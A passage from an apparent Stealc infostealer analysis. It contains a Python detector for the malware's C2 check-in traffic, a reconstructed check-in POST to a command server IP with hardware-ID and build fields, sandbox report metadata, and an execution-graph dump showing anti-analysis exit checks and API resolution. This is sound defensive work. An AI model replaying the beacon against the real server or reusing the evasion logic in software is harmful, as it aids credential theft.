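    method, target, headers, body = parse_http_request(raw_request)
    if method != "POST" or not target.endswith(".php"):
        return False
    content_type = headers.get("content-type", "")
    if not content_type.startswith("multipart/form-data"):
        return False
    try:
        fields = parse_multipart(body, content_type)
    except ValueError:
        return False
    return set(fields) == CHECKIN_FIELDS and bool(fields["hwid"]) and bool(fields["build"])


def decode_response(body: bytes) -> str:
    """The C2 answers with a base64 token; decode it for the analyst."""
    return base64.b64decode(body).decode("ascii", "replace")


# Constructed from the capture: same boundary, fields and reply as the session above
BOUNDARY = b"----GDBKJDGIJECFIEBFIDHC"
CHECKIN_BODY = b"".join([
    b"--", BOUNDARY, b"\r\n",
    b'Content-Disposition: form-data; name="hwid"\r\n\r\n',
    b"972848DFA9442409657292\r\n",
    b"--", BOUNDARY, b"\r\n",
    b'Content-Disposition: form-data; name="build"\r\n\r\n',
    b"mars\r\n",
    b"--", BOUNDARY, b"--\r\n",
])
CHECKIN_REQUEST = b"".join([
    b"POST /c4becf79229cb002.php HTTP/1.1\r\n",
    b"Content-Type: multipart/form-data; boundary=", BOUNDARY, b"\r\n",
    b"Host: 185.215.113.206\r\n",
    b"Content-Length: ", str(len(CHECKIN_BODY)).encode(), b"\r\n",
    b"Connection: Keep-Alive\r\n",
    b"Cache-Control: no-cache\r\n",
    b"\r\n",
    CHECKIN_BODY,
])
C2_RESPONSE_BODY = b"YmxvY2s="

if __name__ == "__main__":
    _, _, hdrs, body = parse_http_request(CHECKIN_REQUEST)
    print("fields:", parse_multipart(body, hdrs["content-type"]))
    print("check-in:", is_stealc_checkin(CHECKIN_REQUEST))
    print("reply:", decode_response(C2_RESPONSE_BODY))
```

                                The reconstructed body is 211 bytes, matching the Content-Length in the capture, and the reply decodes to "block". The field-name test is deliberately strict (exactly two fields) so that ordinary web forms with a hwid field do not match; loosen it if a later build adds fields.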


                                Target ID:0
                                Start time:07:38:55
                                Start date:24/11/2024
                                Path:C:\Users\user\Desktop\file.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\Desktop\file.exe"
                                Imagebase:0x300000
                                File size:1'801'728 bytes
                                MD5 hash:5EF73B409C0A81B7D80CCE15A2E83AD9
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.2046460649.0000000004ED0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2087381883.000000000100E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                Reputation:low
                                Has exited:true


                                  Execution Graph

                                  Execution Coverage:5.2%
                                  Dynamic/Decrypted Code Coverage:0%
                                  Signature Coverage:16.5%
                                  Total number of Nodes:1409
                                  Total number of Limit Nodes:28
                                  Execution graph, condensed from the node/edge dump (addresses are virtual addresses in the image loaded at 0x300000):
                                  • Entry routine 321bf0 first calls 302a90, which invokes 304a60 (RtlAllocateHeap, VirtualProtect) once per string constant, some forty times, then 326390 (GetPEB) → 3265c3 (LoadLibraryA ×5) → a chain of GetProcAddress calls. This is where every API other than the statically imported lstrcpy is resolved.
                                  • Environment checks, each with an ExitProcess edge: 321c29 lstrcpy → 321c35 → 321c65 ExitProcess or 321c6d GetSystemInfo → 321c7d ExitProcess; 301030 GetCurrentProcess, VirtualAllocExNuma → 301057 ExitProcess, otherwise VirtualAlloc → VirtualFree → 3010d0 GlobalMemoryStatusEx → 301112 ExitProcess, otherwise 30111a GetUserDefaultLangID → 321cb0 ExitProcess; 322ad0 GetProcessHeap, RtlAllocateHeap, GetComputerNameA and 322a40 GetUserNameA → 321ce0 ExitProcess.
                                  • Single-instance guard: 321e56 OpenEventA; if the event exists, 321e68 loops on CloseHandle, Sleep, OpenEventA; otherwise 321e8c CreateEventA.
                                  • Date check: 321b20 GetSystemTime → 321820 (string assembly with lstrcpy, lstrcat, lstrlen) → 321b81 sscanf → 302a20 SystemTimeToFileTime ×2 → 321bd6, which branches to 321be2 ExitProcess or continues to 321be9.
                                  • Collection: 31ffd0 and 321570 assemble strings with lstrcpy and lstrlen; 302e70 decrypts well over a hundred further strings through 304a60 (the dump is truncated inside this run); 322740 GetWindowsDirectoryA; 304c50; 318ca0 StrCmpCA; then subroutines the graph summarises only by call count (301530, 8 API calls; 3060d0, 80; 3181b0, 10; 317ee0 lstrlen, lstrcpy, StrCmpCA ×3; 318050 lstrlen, lstrcpy, StrCmpCA; 305640, 8; 317280, 1501; 3183e0, 7; 3024e0, 230; 3185b0, 47; 31c840, 70; 31d0f0, 118; 31d7b0, 104; 31dfa0, 149; 31e500, 108; 31e720, 120; 31e9e0, 110; 31ecb0, 100; 31eb70, 108; 307bc0, 154; 3241e0, 91; 321660, 12) before 320e95 → 321ea5 CloseHandle, ExitProcess.
                                  • Other nodes in the graph: 323130 GetProcessHeap, RtlAllocateHeap, RegOpenKeyExA, RegQueryValueExA, RegCloseKey; 322c10 GetProcessHeap, RtlAllocateHeap, GetTimeZoneInformation, wsprintfA; 3230a0 GetSystemPowerStatus; 3229a0 GetCurrentProcess, IsWow64Process; 324480 OpenProcess, GetModuleFileNameExA, CloseHandle, lstrcpy; 30100e GetCurrentProcess, VirtualAllocExNuma, ExitProcess, VirtualAlloc, VirtualFree; 308e20 strcpy_s, free, std::exception::exception; 328819 memset, free, __getptd; 329711 (134 API calls, __setmbcp); 307710 free; 32749e (6 API calls); and call-count-only nodes 31abb2 (120), 30f639 (144), 3016b9 (200), 30bf39 (177), 314b29 (304), 3123a9 (298), 324e35 (8), 312499 (290), 30db99 (674), 318615 (47), 322880 (10), 323480 (6), 323280 (7), 318c88 (16), 30b309 (98).
API calls 26547->26548 26549 303888 26548->26549 26550 304a60 2 API calls 26549->26550 26551 3038a1 26550->26551 26552 304a60 2 API calls 26551->26552 26553 3038b7 26552->26553 26554 304a60 2 API calls 26553->26554 26555 3038cd 26554->26555 26556 304a60 2 API calls 26555->26556 26557 3038e3 26556->26557 26558 304a60 2 API calls 26557->26558 26559 3038f9 26558->26559 26560 304a60 2 API calls 26559->26560 26561 30390f 26560->26561 26562 304a60 2 API calls 26561->26562 26563 303928 26562->26563 26564 304a60 2 API calls 26563->26564 26565 30393e 26564->26565 26566 304a60 2 API calls 26565->26566 26567 303954 26566->26567 26568 304a60 2 API calls 26567->26568 26569 30396a 26568->26569 26570 304a60 2 API calls 26569->26570 26571 303980 26570->26571 26572 304a60 2 API calls 26571->26572 26573 303996 26572->26573 26574 304a60 2 API calls 26573->26574 26575 3039af 26574->26575 26576 304a60 2 API calls 26575->26576 26577 3039c5 26576->26577 26578 304a60 2 API calls 26577->26578 26579 3039db 26578->26579 26580 304a60 2 API calls 26579->26580 26581 3039f1 26580->26581 26582 304a60 2 API calls 26581->26582 26583 303a07 26582->26583 26584 304a60 2 API calls 26583->26584 26585 303a1d 26584->26585 26586 304a60 2 API calls 26585->26586 26587 303a36 26586->26587 26588 304a60 2 API calls 26587->26588 26589 303a4c 26588->26589 26590 304a60 2 API calls 26589->26590 26591 303a62 26590->26591 26592 304a60 2 API calls 26591->26592 26593 303a78 26592->26593 26594 304a60 2 API calls 26593->26594 26595 303a8e 26594->26595 26596 304a60 2 API calls 26595->26596 26597 303aa4 26596->26597 26598 304a60 2 API calls 26597->26598 26599 303abd 26598->26599 26600 304a60 2 API calls 26599->26600 26601 303ad3 26600->26601 26602 304a60 2 API calls 26601->26602 26603 303ae9 26602->26603 26604 304a60 2 API calls 26603->26604 26605 303aff 26604->26605 26606 304a60 2 API calls 26605->26606 26607 303b15 26606->26607 26608 304a60 2 API calls 26607->26608 26609 303b2b 26608->26609 26610 304a60 2 API calls 
26609->26610 26611 303b44 26610->26611 26612 304a60 2 API calls 26611->26612 26613 303b5a 26612->26613 26614 304a60 2 API calls 26613->26614 26615 303b70 26614->26615 26616 304a60 2 API calls 26615->26616 26617 303b86 26616->26617 26618 304a60 2 API calls 26617->26618 26619 303b9c 26618->26619 26620 304a60 2 API calls 26619->26620 26621 303bb2 26620->26621 26622 304a60 2 API calls 26621->26622 26623 303bcb 26622->26623 26624 304a60 2 API calls 26623->26624 26625 303be1 26624->26625 26626 304a60 2 API calls 26625->26626 26627 303bf7 26626->26627 26628 304a60 2 API calls 26627->26628 26629 303c0d 26628->26629 26630 304a60 2 API calls 26629->26630 26631 303c23 26630->26631 26632 304a60 2 API calls 26631->26632 26633 303c39 26632->26633 26634 304a60 2 API calls 26633->26634 26635 303c52 26634->26635 26636 304a60 2 API calls 26635->26636 26637 303c68 26636->26637 26638 304a60 2 API calls 26637->26638 26639 303c7e 26638->26639 26640 304a60 2 API calls 26639->26640 26641 303c94 26640->26641 26642 304a60 2 API calls 26641->26642 26643 303caa 26642->26643 26644 304a60 2 API calls 26643->26644 26645 303cc0 26644->26645 26646 304a60 2 API calls 26645->26646 26647 303cd9 26646->26647 26648 304a60 2 API calls 26647->26648 26649 303cef 26648->26649 26650 304a60 2 API calls 26649->26650 26651 303d05 26650->26651 26652 304a60 2 API calls 26651->26652 26653 303d1b 26652->26653 26654 304a60 2 API calls 26653->26654 26655 303d31 26654->26655 26656 304a60 2 API calls 26655->26656 26657 303d47 26656->26657 26658 304a60 2 API calls 26657->26658 26659 303d60 26658->26659 26660 304a60 2 API calls 26659->26660 26661 303d76 26660->26661 26662 304a60 2 API calls 26661->26662 26663 303d8c 26662->26663 26664 304a60 2 API calls 26663->26664 26665 303da2 26664->26665 26666 304a60 2 API calls 26665->26666 26667 303db8 26666->26667 26668 304a60 2 API calls 26667->26668 26669 303dce 26668->26669 26670 304a60 2 API calls 26669->26670 26671 303de7 26670->26671 26672 304a60 2 API calls 26671->26672 
26673 303dfd 26672->26673 26674 304a60 2 API calls 26673->26674 26675 303e13 26674->26675 26676 304a60 2 API calls 26675->26676 26677 303e29 26676->26677 26678 304a60 2 API calls 26677->26678 26679 303e3f 26678->26679 26680 304a60 2 API calls 26679->26680 26681 303e55 26680->26681 26682 304a60 2 API calls 26681->26682 26683 303e6e 26682->26683 26684 304a60 2 API calls 26683->26684 26685 303e84 26684->26685 26686 304a60 2 API calls 26685->26686 26687 303e9a 26686->26687 26688 304a60 2 API calls 26687->26688 26689 303eb0 26688->26689 26690 304a60 2 API calls 26689->26690 26691 303ec6 26690->26691 26692 304a60 2 API calls 26691->26692 26693 303edc 26692->26693 26694 304a60 2 API calls 26693->26694 26695 303ef5 26694->26695 26696 304a60 2 API calls 26695->26696 26697 303f0b 26696->26697 26698 304a60 2 API calls 26697->26698 26699 303f21 26698->26699 26700 304a60 2 API calls 26699->26700 26701 303f37 26700->26701 26702 304a60 2 API calls 26701->26702 26703 303f4d 26702->26703 26704 304a60 2 API calls 26703->26704 26705 303f63 26704->26705 26706 304a60 2 API calls 26705->26706 26707 303f7c 26706->26707 26708 304a60 2 API calls 26707->26708 26709 303f92 26708->26709 26710 304a60 2 API calls 26709->26710 26711 303fa8 26710->26711 26712 304a60 2 API calls 26711->26712 26713 303fbe 26712->26713 26714 304a60 2 API calls 26713->26714 26715 303fd4 26714->26715 26716 304a60 2 API calls 26715->26716 26717 303fea 26716->26717 26718 304a60 2 API calls 26717->26718 26719 304003 26718->26719 26720 304a60 2 API calls 26719->26720 26721 304019 26720->26721 26722 304a60 2 API calls 26721->26722 26723 30402f 26722->26723 26724 304a60 2 API calls 26723->26724 26725 304045 26724->26725 26726 304a60 2 API calls 26725->26726 26727 30405b 26726->26727 26728 304a60 2 API calls 26727->26728 26729 304071 26728->26729 26730 304a60 2 API calls 26729->26730 26731 30408a 26730->26731 26732 304a60 2 API calls 26731->26732 26733 3040a0 26732->26733 26734 304a60 2 API calls 26733->26734 26735 3040b6 
26734->26735 26736 304a60 2 API calls 26735->26736 26737 3040cc 26736->26737 26738 304a60 2 API calls 26737->26738 26739 3040e2 26738->26739 26740 304a60 2 API calls 26739->26740 26741 3040f8 26740->26741 26742 304a60 2 API calls 26741->26742 26743 304111 26742->26743 26744 304a60 2 API calls 26743->26744 26745 304127 26744->26745 26746 304a60 2 API calls 26745->26746 26747 30413d 26746->26747 26748 304a60 2 API calls 26747->26748 26749 304153 26748->26749 26750 304a60 2 API calls 26749->26750 26751 304169 26750->26751 26752 304a60 2 API calls 26751->26752 26753 30417f 26752->26753 26754 304a60 2 API calls 26753->26754 26755 304198 26754->26755 26756 304a60 2 API calls 26755->26756 26757 3041ae 26756->26757 26758 304a60 2 API calls 26757->26758 26759 3041c4 26758->26759 26760 304a60 2 API calls 26759->26760 26761 3041da 26760->26761 26762 304a60 2 API calls 26761->26762 26763 3041f0 26762->26763 26764 304a60 2 API calls 26763->26764 26765 304206 26764->26765 26766 304a60 2 API calls 26765->26766 26767 30421f 26766->26767 26768 304a60 2 API calls 26767->26768 26769 304235 26768->26769 26770 304a60 2 API calls 26769->26770 26771 30424b 26770->26771 26772 304a60 2 API calls 26771->26772 26773 304261 26772->26773 26774 304a60 2 API calls 26773->26774 26775 304277 26774->26775 26776 304a60 2 API calls 26775->26776 26777 30428d 26776->26777 26778 304a60 2 API calls 26777->26778 26779 3042a6 26778->26779 26780 304a60 2 API calls 26779->26780 26781 3042bc 26780->26781 26782 304a60 2 API calls 26781->26782 26783 3042d2 26782->26783 26784 304a60 2 API calls 26783->26784 26785 3042e8 26784->26785 26786 304a60 2 API calls 26785->26786 26787 3042fe 26786->26787 26788 304a60 2 API calls 26787->26788 26789 304314 26788->26789 26790 304a60 2 API calls 26789->26790 26791 30432d 26790->26791 26792 304a60 2 API calls 26791->26792 26793 304343 26792->26793 26794 304a60 2 API calls 26793->26794 26795 304359 26794->26795 26796 304a60 2 API calls 26795->26796 26797 30436f 26796->26797 
26798 304a60 2 API calls 26797->26798 26799 304385 26798->26799 26800 304a60 2 API calls 26799->26800 26801 30439b 26800->26801 26802 304a60 2 API calls 26801->26802 26803 3043b4 26802->26803 26804 304a60 2 API calls 26803->26804 26805 3043ca 26804->26805 26806 304a60 2 API calls 26805->26806 26807 3043e0 26806->26807 26808 304a60 2 API calls 26807->26808 26809 3043f6 26808->26809 26810 304a60 2 API calls 26809->26810 26811 30440c 26810->26811 26812 304a60 2 API calls 26811->26812 26813 304422 26812->26813 26814 304a60 2 API calls 26813->26814 26815 30443b 26814->26815 26816 304a60 2 API calls 26815->26816 26817 304451 26816->26817 26818 304a60 2 API calls 26817->26818 26819 304467 26818->26819 26820 304a60 2 API calls 26819->26820 26821 30447d 26820->26821 26822 304a60 2 API calls 26821->26822 26823 304493 26822->26823 26824 304a60 2 API calls 26823->26824 26825 3044a9 26824->26825 26826 304a60 2 API calls 26825->26826 26827 3044c2 26826->26827 26828 304a60 2 API calls 26827->26828 26829 3044d8 26828->26829 26830 304a60 2 API calls 26829->26830 26831 3044ee 26830->26831 26832 304a60 2 API calls 26831->26832 26833 304504 26832->26833 26834 304a60 2 API calls 26833->26834 26835 30451a 26834->26835 26836 304a60 2 API calls 26835->26836 26837 304530 26836->26837 26838 304a60 2 API calls 26837->26838 26839 304549 26838->26839 26840 304a60 2 API calls 26839->26840 26841 30455f 26840->26841 26842 304a60 2 API calls 26841->26842 26843 304575 26842->26843 26844 304a60 2 API calls 26843->26844 26845 30458b 26844->26845 26846 304a60 2 API calls 26845->26846 26847 3045a1 26846->26847 26848 304a60 2 API calls 26847->26848 26849 3045b7 26848->26849 26850 304a60 2 API calls 26849->26850 26851 3045d0 26850->26851 26852 304a60 2 API calls 26851->26852 26853 3045e6 26852->26853 26854 304a60 2 API calls 26853->26854 26855 3045fc 26854->26855 26856 304a60 2 API calls 26855->26856 26857 304612 26856->26857 26858 304a60 2 API calls 26857->26858 26859 304628 26858->26859 26860 304a60 2 
API calls 26859->26860 26861 30463e 26860->26861 26862 304a60 2 API calls 26861->26862 26863 304657 26862->26863 26864 304a60 2 API calls 26863->26864 26865 30466d 26864->26865 26866 304a60 2 API calls 26865->26866 26867 304683 26866->26867 26868 304a60 2 API calls 26867->26868 26869 304699 26868->26869 26870 304a60 2 API calls 26869->26870 26871 3046af 26870->26871 26872 304a60 2 API calls 26871->26872 26873 3046c5 26872->26873 26874 304a60 2 API calls 26873->26874 26875 3046de 26874->26875 26876 304a60 2 API calls 26875->26876 26877 3046f4 26876->26877 26878 304a60 2 API calls 26877->26878 26879 30470a 26878->26879 26880 304a60 2 API calls 26879->26880 26881 304720 26880->26881 26882 304a60 2 API calls 26881->26882 26883 304736 26882->26883 26884 304a60 2 API calls 26883->26884 26885 30474c 26884->26885 26886 304a60 2 API calls 26885->26886 26887 304765 26886->26887 26888 304a60 2 API calls 26887->26888 26889 30477b 26888->26889 26890 304a60 2 API calls 26889->26890 26891 304791 26890->26891 26892 304a60 2 API calls 26891->26892 26893 3047a7 26892->26893 26894 304a60 2 API calls 26893->26894 26895 3047bd 26894->26895 26896 304a60 2 API calls 26895->26896 26897 3047d3 26896->26897 26898 304a60 2 API calls 26897->26898 26899 3047ec 26898->26899 26900 304a60 2 API calls 26899->26900 26901 304802 26900->26901 26902 304a60 2 API calls 26901->26902 26903 304818 26902->26903 26904 304a60 2 API calls 26903->26904 26905 30482e 26904->26905 26906 304a60 2 API calls 26905->26906 26907 304844 26906->26907 26908 304a60 2 API calls 26907->26908 26909 30485a 26908->26909 26910 304a60 2 API calls 26909->26910 26911 304873 26910->26911 26912 304a60 2 API calls 26911->26912 26913 304889 26912->26913 26914 304a60 2 API calls 26913->26914 26915 30489f 26914->26915 26916 304a60 2 API calls 26915->26916 26917 3048b5 26916->26917 26918 304a60 2 API calls 26917->26918 26919 3048cb 26918->26919 26920 304a60 2 API calls 26919->26920 26921 3048e1 26920->26921 26922 304a60 2 API calls 
26921->26922 26923 3048fa 26922->26923 26924 304a60 2 API calls 26923->26924 26925 304910 26924->26925 26926 304a60 2 API calls 26925->26926 26927 304926 26926->26927 26928 304a60 2 API calls 26927->26928 26929 30493c 26928->26929 26930 304a60 2 API calls 26929->26930 26931 304952 26930->26931 26932 304a60 2 API calls 26931->26932 26933 304968 26932->26933 26934 304a60 2 API calls 26933->26934 26935 304981 26934->26935 26936 304a60 2 API calls 26935->26936 26937 304997 26936->26937 26938 304a60 2 API calls 26937->26938 26939 3049ad 26938->26939 26940 304a60 2 API calls 26939->26940 26941 3049c3 26940->26941 26942 304a60 2 API calls 26941->26942 26943 3049d9 26942->26943 26944 304a60 2 API calls 26943->26944 26945 3049ef 26944->26945 26946 304a60 2 API calls 26945->26946 26947 304a08 26946->26947 26948 304a60 2 API calls 26947->26948 26949 304a1e 26948->26949 26950 304a60 2 API calls 26949->26950 26951 304a34 26950->26951 26952 304a60 2 API calls 26951->26952 26953 304a4a 26952->26953 26954 3266e0 26953->26954 26955 326afe 8 API calls 26954->26955 26956 3266ed 43 API calls 26954->26956 26957 326b94 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 26955->26957 26958 326c08 26955->26958 26956->26955 26957->26958 26959 326cd2 26958->26959 26960 326c15 8 API calls 26958->26960 26961 326cdb GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 26959->26961 26962 326d4f 26959->26962 26960->26959 26961->26962 26963 326de9 26962->26963 26964 326d5c 6 API calls 26962->26964 26965 326f10 26963->26965 26966 326df6 12 API calls 26963->26966 26964->26963 26967 326f19 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 26965->26967 26968 326f8d 26965->26968 26966->26965 26967->26968 26969 326fc1 26968->26969 26970 326f96 GetProcAddress GetProcAddress 26968->26970 26971 326ff5 26969->26971 26972 326fca GetProcAddress GetProcAddress 26969->26972 26970->26969 26973 327002 10 API calls 26971->26973 26974 3270ed 
26971->26974 26972->26971 26973->26974 26975 327152 26974->26975 26976 3270f6 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 26974->26976 26977 32715b GetProcAddress 26975->26977 26978 32716e 26975->26978 26976->26975 26977->26978 26979 32051f 26978->26979 26980 327177 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 26978->26980 26981 301530 26979->26981 26980->26979 27290 301610 26981->27290 26983 30155d 26986 301577 lstrcpy 26983->26986 26987 30157f 26983->26987 26984 30153b 26984->26983 26985 301555 lstrcpy 26984->26985 26985->26983 26986->26987 26988 301599 lstrcpy 26987->26988 26990 3015a1 26987->26990 26988->26990 26989 301605 26992 31f1b0 lstrlen 26989->26992 26990->26989 26991 3015fd lstrcpy 26990->26991 26991->26989 26993 31f1e4 26992->26993 26994 31f1f7 lstrlen 26993->26994 26995 31f1eb lstrcpy 26993->26995 26996 31f208 26994->26996 26995->26994 26997 31f21b lstrlen 26996->26997 26998 31f20f lstrcpy 26996->26998 26999 31f22c 26997->26999 26998->26997 27000 31f233 lstrcpy 26999->27000 27001 31f23f 26999->27001 27000->27001 27002 31f258 lstrcpy 27001->27002 27003 31f264 27001->27003 27002->27003 27004 31f286 lstrcpy 27003->27004 27005 31f292 27003->27005 27004->27005 27006 31f2ba lstrcpy 27005->27006 27007 31f2c6 27005->27007 27006->27007 27008 31f2ea lstrcpy 27007->27008 27059 31f300 27007->27059 27008->27059 27009 31f30c lstrlen 27009->27059 27010 31f4b9 lstrcpy 27010->27059 27011 31f3a1 lstrcpy 27011->27059 27012 31f3c5 lstrcpy 27012->27059 27013 31f4e8 lstrcpy 27073 31f4f0 27013->27073 27014 31f479 lstrcpy 27014->27059 27015 31f59c lstrcpy 27015->27073 27016 31f70f StrCmpCA 27021 31fe8e 27016->27021 27016->27059 27017 31f616 StrCmpCA 27017->27016 27017->27073 27018 31fa29 StrCmpCA 27030 31fe2b 27018->27030 27018->27059 27019 31f73e lstrlen 27019->27059 27020 31fd4d StrCmpCA 27024 31fd60 Sleep 27020->27024 27035 31fd75 27020->27035 27022 31fead lstrlen 27021->27022 27023 31fea5 lstrcpy 27021->27023 27028 31fec7 27022->27028 
27023->27022 27024->27059 27025 31fa58 lstrlen 27025->27059 27026 31f64a lstrcpy 27026->27073 27027 301530 8 API calls 27027->27073 27038 31fee7 lstrlen 27028->27038 27041 31fedf lstrcpy 27028->27041 27029 31fe4a lstrlen 27037 31fe64 27029->27037 27030->27029 27033 31fe42 lstrcpy 27030->27033 27031 31ee90 28 API calls 27031->27073 27032 31f89e lstrcpy 27032->27059 27033->27029 27034 31fd94 lstrlen 27049 31fdae 27034->27049 27035->27034 27039 31fd8c lstrcpy 27035->27039 27036 31f76f lstrcpy 27036->27059 27043 31fdce lstrlen 27037->27043 27046 31fe7c lstrcpy 27037->27046 27044 31ff01 27038->27044 27039->27034 27040 31fbb8 lstrcpy 27040->27059 27041->27038 27042 31fa89 lstrcpy 27042->27059 27056 31fde8 27043->27056 27050 31ff21 27044->27050 27057 31ff19 lstrcpy 27044->27057 27045 31f791 lstrcpy 27045->27059 27046->27043 27048 31f8cd lstrcpy 27048->27073 27049->27043 27053 31fdc6 lstrcpy 27049->27053 27058 301610 4 API calls 27050->27058 27051 31f698 lstrcpy 27051->27073 27052 31faab lstrcpy 27052->27059 27053->27043 27054 301530 8 API calls 27054->27059 27055 31fbe7 lstrcpy 27055->27073 27062 31fe08 27056->27062 27063 31fe00 lstrcpy 27056->27063 27057->27050 27076 31fe13 27058->27076 27059->27009 27059->27010 27059->27011 27059->27012 27059->27013 27059->27014 27059->27016 27059->27018 27059->27019 27059->27020 27059->27025 27059->27032 27059->27036 27059->27040 27059->27042 27059->27045 27059->27048 27059->27052 27059->27054 27059->27055 27061 31ee90 28 API calls 27059->27061 27065 31f7e2 lstrcpy 27059->27065 27068 31fafc lstrcpy 27059->27068 27059->27073 27060 31efb0 35 API calls 27060->27073 27061->27059 27064 301610 4 API calls 27062->27064 27063->27062 27064->27076 27065->27059 27066 31f924 lstrcpy 27066->27073 27067 31f99e StrCmpCA 27067->27018 27067->27073 27068->27059 27069 31fc3e lstrcpy 27069->27073 27070 31fcb8 StrCmpCA 27070->27020 27070->27073 27071 31f9cb lstrcpy 27071->27073 27072 31fce9 lstrcpy 27072->27073 27073->27015 27073->27017 27073->27018 
27073->27020 27073->27026 27073->27027 27073->27031 27073->27051 27073->27059 27073->27060 27073->27066 27073->27067 27073->27069 27073->27070 27073->27071 27073->27072 27074 31fa19 lstrcpy 27073->27074 27075 31fd3a lstrcpy 27073->27075 27074->27073 27075->27073 27076->26100 27078 322785 27077->27078 27079 32278c GetVolumeInformationA 27077->27079 27078->27079 27080 3227ec GetProcessHeap RtlAllocateHeap 27079->27080 27082 322822 27080->27082 27083 322826 wsprintfA 27080->27083 27300 3271e0 27082->27300 27083->27082 27087 304c70 27086->27087 27088 304c85 27087->27088 27089 304c7d lstrcpy 27087->27089 27304 304bc0 27088->27304 27089->27088 27091 304c90 27092 304ccc lstrcpy 27091->27092 27093 304cd8 27091->27093 27092->27093 27094 304cff lstrcpy 27093->27094 27095 304d0b 27093->27095 27094->27095 27096 304d2f lstrcpy 27095->27096 27097 304d3b 27095->27097 27096->27097 27098 304d6d lstrcpy 27097->27098 27099 304d79 27097->27099 27098->27099 27100 304da0 lstrcpy 27099->27100 27101 304dac InternetOpenA StrCmpCA 27099->27101 27100->27101 27102 304de0 27101->27102 27103 3054b8 InternetCloseHandle CryptStringToBinaryA 27102->27103 27308 323e70 27102->27308 27104 3054e8 LocalAlloc 27103->27104 27121 3055d8 27103->27121 27106 3054ff CryptStringToBinaryA 27104->27106 27104->27121 27107 305517 LocalFree 27106->27107 27108 305529 lstrlen 27106->27108 27107->27121 27109 30553d 27108->27109 27111 305563 lstrlen 27109->27111 27112 305557 lstrcpy 27109->27112 27110 304dfa 27113 304e23 lstrcpy lstrcat 27110->27113 27114 304e38 27110->27114 27116 30557d 27111->27116 27112->27111 27113->27114 27115 304e5a lstrcpy 27114->27115 27118 304e62 27114->27118 27115->27118 27117 30558f lstrcpy lstrcat 27116->27117 27119 3055a2 27116->27119 27117->27119 27120 304e71 lstrlen 27118->27120 27122 3055d1 27119->27122 27124 3055c9 lstrcpy 27119->27124 27123 304e89 27120->27123 27121->26129 27122->27121 27125 304e95 lstrcpy lstrcat 27123->27125 27126 304eac 27123->27126 27124->27122 27125->27126 27127 
304ed5 27126->27127 27128 304ecd lstrcpy 27126->27128 27129 304edc lstrlen 27127->27129 27128->27127 27130 304ef2 27129->27130 27131 304efe lstrcpy lstrcat 27130->27131 27132 304f15 27130->27132 27131->27132 27133 304f36 lstrcpy 27132->27133 27134 304f3e 27132->27134 27133->27134 27135 304f65 lstrcpy lstrcat 27134->27135 27136 304f7b 27134->27136 27135->27136 27137 304fa4 27136->27137 27138 304f9c lstrcpy 27136->27138 27139 304fab lstrlen 27137->27139 27138->27137 27140 304fc1 27139->27140 27141 304fcd lstrcpy lstrcat 27140->27141 27142 304fe4 27140->27142 27141->27142 27143 30500d 27142->27143 27144 305005 lstrcpy 27142->27144 27145 305014 lstrlen 27143->27145 27144->27143 27146 30502a 27145->27146 27147 305036 lstrcpy lstrcat 27146->27147 27148 30504d 27146->27148 27147->27148 27149 305079 27148->27149 27150 305071 lstrcpy 27148->27150 27151 305080 lstrlen 27149->27151 27150->27149 27152 30509b 27151->27152 27153 3050ac lstrcpy lstrcat 27152->27153 27154 3050bc 27152->27154 27153->27154 27155 3050da lstrcpy lstrcat 27154->27155 27156 3050ed 27154->27156 27155->27156 27157 30510b lstrcpy 27156->27157 27158 305113 27156->27158 27157->27158 27159 305121 InternetConnectA 27158->27159 27159->27103 27160 305150 HttpOpenRequestA 27159->27160 27161 3054b1 InternetCloseHandle 27160->27161 27162 30518b 27160->27162 27161->27103 27315 327310 lstrlen 27162->27315 27166 3051a4 27323 3272c0 27166->27323 27169 327280 lstrcpy 27170 3051c0 27169->27170 27171 327310 3 API calls 27170->27171 27172 3051d5 27171->27172 27173 327280 lstrcpy 27172->27173 27174 3051de 27173->27174 27175 327310 3 API calls 27174->27175 27176 3051f4 27175->27176 27177 327280 lstrcpy 27176->27177 27178 3051fd 27177->27178 27179 327310 3 API calls 27178->27179 27180 305213 27179->27180 27181 327280 lstrcpy 27180->27181 27182 30521c 27181->27182 27183 327310 3 API calls 27182->27183 27184 305231 27183->27184 27185 327280 lstrcpy 27184->27185 27186 30523a 27185->27186 27187 3272c0 2 API calls 27186->27187 
27188 30524d 27187->27188 27189 327280 lstrcpy 27188->27189 27190 305256 27189->27190 27191 327310 3 API calls 27190->27191 27192 30526b 27191->27192 27193 327280 lstrcpy 27192->27193 27194 305274 27193->27194 27195 327310 3 API calls 27194->27195 27196 305289 27195->27196 27197 327280 lstrcpy 27196->27197 27198 305292 27197->27198 27199 3272c0 2 API calls 27198->27199 27200 3052a5 27199->27200 27201 327280 lstrcpy 27200->27201 27202 3052ae 27201->27202 27203 327310 3 API calls 27202->27203 27204 3052c3 27203->27204 27205 327280 lstrcpy 27204->27205 27206 3052cc 27205->27206 27207 327310 3 API calls 27206->27207 27208 3052e2 27207->27208 27209 327280 lstrcpy 27208->27209 27210 3052eb 27209->27210 27211 327310 3 API calls 27210->27211 27212 305301 27211->27212 27213 327280 lstrcpy 27212->27213 27214 30530a 27213->27214 27215 327310 3 API calls 27214->27215 27216 30531f 27215->27216 27217 327280 lstrcpy 27216->27217 27218 305328 27217->27218 27219 3272c0 2 API calls 27218->27219 27220 30533b 27219->27220 27221 327280 lstrcpy 27220->27221 27222 305344 27221->27222 27223 305370 lstrcpy 27222->27223 27224 30537c 27222->27224 27223->27224 27225 3272c0 2 API calls 27224->27225 27226 30538a 27225->27226 27227 3272c0 2 API calls 27226->27227 27228 305397 27227->27228 27229 327280 lstrcpy 27228->27229 27230 3053a1 27229->27230 27231 3053b1 lstrlen lstrlen 